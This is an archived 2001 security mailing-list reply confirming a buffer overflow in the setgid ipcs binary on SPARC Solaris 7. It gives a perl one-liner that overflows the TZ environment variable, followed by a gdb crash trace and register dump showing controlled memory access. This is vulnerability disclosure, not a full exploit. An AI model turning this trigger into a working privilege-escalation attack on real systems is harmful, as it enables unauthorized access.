Re: Solaris ipcs vulnerability

From: ARAI Yuu (y.araiat_private)
Date: Mon Apr 16 2001 - 09:32:03 PDT

  • Next message: Mike Batchelor: "Re: Solaris ipcs vulnerability" 

    Hi,

I could reproduce same buffer overflow on SPARC Solaris 7.
/usr/bin/sparcv7/ipcs is installed as sgid "sys".

---
# TZ=`/usr/local/bin/perl -e 'print "A"x1107'`
# ./ipcs
Segmentation Fault (core dumped)
# /usr/local/bin/gdb ./ipcs core
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
(no debugging symbols found)...
Core was generated by `./ipcs'.
Program terminated with signal 11, Segmentation Fault.
Reading symbols from /usr/lib/libkvm.so.1...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libelf.so.1...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libc.so.1...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libdl.so.1...(no debugging symbols found)...done.
Reading symbols from /usr/platform/SUNW,Ultra-2/lib/libc_psr.so.1...
(no debugging symbols found)...done.
#0  0xff2bd830 in nvmatch () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2bd830 in nvmatch () from /usr/lib/libc.so.1
#1  0xff2bd8dc in getenv () from /usr/lib/libc.so.1
#2  0xff2f6d8c in dcgettext_u () from /usr/lib/libc.so.1
#3  0xff2f6cb0 in gettext () from /usr/lib/libc.so.1
#4  0x112d8 in main ()
#5  0x10e8c in _start ()
Cannot access memory at address 0x41414179.
(gdb) info registers
g0             0x0      0
g1             0xff3107b0       -13563984
g2             0x0      0
g3             0x0      0
g4             0x0      0
g5             0x0      0
g6             0x0      0
g7             0x0      0
o0             0xff321ccc       -13493044
o1             0xbef9a7 12515751
o2             0xff331f98       -13426792
o3             0xff31f296       -13503850
o4             0xff331f98       -13426792
o5             0xff2bd8a8       -13903704
sp             0xffbee758       -4266152
o7             0xff2bd8d4       -13903660
l0             0xff3a0148       -12975800
l1             0x45658  284248
l2             0xff286940       -14128832
l3             0xff2f6c80       -13669248
l4             0x0      0
l5             0x0      0
l6             0x0      0
l7             0x0      0
i0             0xff321ccc       -13493044
i1             0x223b4  140212
i2             0xff331f98       -13426792
i3             0x0      0
i4             0xffbef8b4       -4261708
i5             0xf      15
fp             0xffbee7b8       -4266056
i7             0xff2f6d84       -13668988
y              0x0      0
psr            0xfe000000       -33554432       icc:----, pil:0, s:0, ps:0, et:0
, cwp:0
wim            0x0      0
tbr            0x0      0
pc             0xff2bd830       -13903824
npc            0xff2bd834       -13903820
fpsr           0x0      0       rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, a
exc:0, cexc:0
cpsr           0x0      0
---

It seems that "core" installation of Solaris 7 will not install
/usr/bin/sparcv7/ipcs.

Regards,
-----------------------------------------------
ARAI Yuu <y.araiat_private>
Security Engineer / LAC Computer Security Laboratory
http://www.lac.co.jp/security/

    This archive was generated by hypermail 2b30 : Mon Apr 16 2001 - 12:13:15 PDT